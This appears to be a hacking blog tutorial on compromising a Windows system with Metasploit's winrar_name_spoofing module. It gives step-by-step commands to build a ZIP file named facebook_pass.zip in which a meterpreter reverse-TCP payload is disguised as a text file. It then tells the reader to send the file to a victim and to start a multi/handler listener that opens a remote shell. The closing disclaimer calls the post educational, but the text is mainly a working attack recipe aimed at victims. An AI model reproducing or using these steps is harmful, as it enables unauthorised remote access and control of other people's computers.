Hello folks, In this post, I’ll be explaining to you that how can you Hack windows System using a Text file using Metasploit framework. This trick uses winrar_name_spoofing vulnerability. Using this vulnerability we can create a vulnerable ZIP file and inside a zip file, the payload file will be present in the form of .txt format. Whenever a victim opens that text file, a meterpreter session will be established on the Attacker side. So let’s start the tutorial.
Requirements
For the better understanding of this tutorial, please read this post first
What Are We Covering Today?
1. We will generate a Payload in ZIP format using Metasploit Framework
2. after that, we will create a listener for that payload
3. Now we will exploit the victim’s system.
Steps to create a Payload using Metasploit Framework
Step 1: Open the terminal and launch the Metasploit framework using the following command
msfconsole
Step 2: Once you are in msfconsole, type the following command to use the winrar_name_spoofing vulnerability
use exploit/windows/fileformat/winrar_name_spoofing
Step 3: Now you can type the following command to show the available option which can be used to generate the Payload
show options
The output of the command show options will be as follows.
in this, there are two options we have to set. The first one is FILENAME which will be in .zip format and the second one is SPOOF which will be in .txt format
Step 4: Now we have to set the name of the file and the name of the spoofed file which will be inside the ZIP file. for that execute the following commands one by one
set FILENAME facebook_pass.zip set SPOOF pass.txt
Step 5: In this step, we need to set LHOST and LPORT. since I’m using it on my Local Network, I’ll put my local IP Address and LPORT as 4444. execute the following commands one by one
set LHOST 192.168.0.104 set LPORT 4444
Step 6: Now we need to set the Payload, to do that execute the following command in the terminal
set payload windows/meterpreter/reverse_tcp
Now type exploit and then a file with named facebook_pass.zip will be created into the location /root/.msf4/local/facebook.pass.zip Copy the file and sent it to the victim by any method you want.
Steps to create a Listener for the Payload
In this step, we will create a listener for our Payload. This process is the same as we have done in our Android hacking post.
Step 1: Now type the following command to use the multi/handler
use exploit/multi/handler
Step 2: Now we need to set the payload, for that we need to execute the following command
set payload windows/meterpreter/reverse_tcp
Step 3: Now set the LHOST and LPORT for the listener, type the following command for that
set LHOST 192.168.0.104 set PORT 4444
Step 4: Now type the exploit in the terminal, and your exploit will run
exploit
Disclaimer: My dear visitors, this article is only for the sake of education, please do not misuse all the guide given below this may cause some actions on you. if this happens then this blog will not be responsible for that
